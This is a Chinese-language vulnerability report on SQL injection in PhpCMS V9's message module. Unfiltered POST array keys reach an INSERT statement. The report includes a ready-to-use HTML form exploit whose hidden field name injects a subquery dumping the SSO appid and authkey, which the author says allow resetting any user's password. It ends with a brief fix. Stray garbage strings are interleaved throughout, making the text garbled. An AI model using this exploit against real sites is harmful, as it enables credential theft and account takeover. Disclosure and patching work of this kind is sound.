PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：
  R9 h# Z% q9 R# B" i( S
* {+ F9 x! W( S) Y0 o第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。
9 ]6 C/ {4 y5 |: \; S
0 w' w, U5 P& z" k4 n/ s% e  m明天再更新下一个漏洞。
. f& r& `0 q: w" I% \$ C详细说明：
! o' J6 c* v9 K' y1 _在/phpcms9/phpcms/modules/message/index.php中有代码如下：

$messageid = $this->message_db->insert($_POST['info'],true);
8 Y6 c3 n, [- j& G4 T
% X' p* d6 N* @$ i# b' x3 E
2 G$ r7 ~( q% A) C1 `/ @5 [( v& ainsert方法是key value的，代码如下：

public function insert($data, $table, $return_insert_id = false, $replace = false) {
                if(!is_array( $data ) || $table == '' || count($data) == 0) {
                        return false;
. q' v, C1 D% W% I                }
2 t6 b4 K. x; g% W- T, F. x3 y               
                $fielddata = array_keys($data);
9 T7 [# a# ?! r3 z                $valuedata = array_values($data);
                array_walk($fielddata, array($this, 'add_special_char'));
6 g5 t+ U2 U1 M  ]; k# S                array_walk($valuedata, array($this, 'escape_string'));
               
2 o/ p. D5 ]! {2 E& i  g. o                $field = implode (',', $fielddata);
                $value = implode (',', $valuedata);

                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
3 X9 ^" Q5 k- ]4 i. w8 n/ W. O" _                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
                $return = $this->execute($sql);
                return $return_insert_id ? $this->insert_id() : $return;
6 E6 g9 m( v& i( r: A        }
. W1 @4 V2 u6 ^

, ^( w0 G1 x% b( R5 n3 b2 Z3 @嗯，很遗憾的是

4 c( a- k; r: P# C. Y0 T* T% sarray_walk($fielddata, array($this, 'add_special_char'));
, n! L, l; O6 }, f7 `' m. c- ~
; @) t8 G5 m- W! J, g- g( M- F8 i
6 Z- {1 j6 n+ N9 y. l中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。

到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。
  e# J3 B! {: n6 l( I4 E- e
漏洞证明：
读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。
* a# P1 j" P& u6 E
0 j0 C; Q3 V& W$ Y$ S' O7 v2 a' d
. K1 {) Z! {4 Y% r2 p6 ]0 Q( I表单如下：用户名什么的得自己改一改。
3 x: A7 D* _0 J/ d: N1 b0 R, T9 v* Z<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
$ e8 R- s: a; {; R" T' O<table width="100%" cellspacing="0" class="table_form">
<tr>
<th>标 题：</th>
" Y6 D, k) r( E<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
</tr>
<tr>
. `% J1 Q/ ?3 \. L9 w/ r<th>内 容：</th>
<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
; u; s: E+ h/ c' v</tr>
<input type="hidden" name="info[replyid]" value="2" />
( C; [: I! b. F& w& `3 k# g<input type="hidden" name="info[send_to_id]" value="cc" />
<input type="hidden" name="info[send_from_id]" value="hh">
<!-- 漏洞的利用重点在这里开始 -->
<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
<!-- 漏洞的利用重点在这里结束 -->
<tr>
) B& Y9 ]9 E$ R# y7 b9 m<th>验证码：</th>
, ?- y( ?$ f9 \3 [2 v<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
</tr>
; I9 i) B7 ?5 Q: N- H<tr>
<td></td>
<td colspan="2"><label>
  e! S) J6 H3 L/ U<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
% ^+ ]  `& C& F9 D/ B+ f</label></td>
</tr>
( h. r$ W/ W  f8 V. C</table>
</form>
& \. A; }: v* U: f/ L在add_special_char函数内对key做过滤就可以了。



. j4 D* A7 z9 r. Y9 A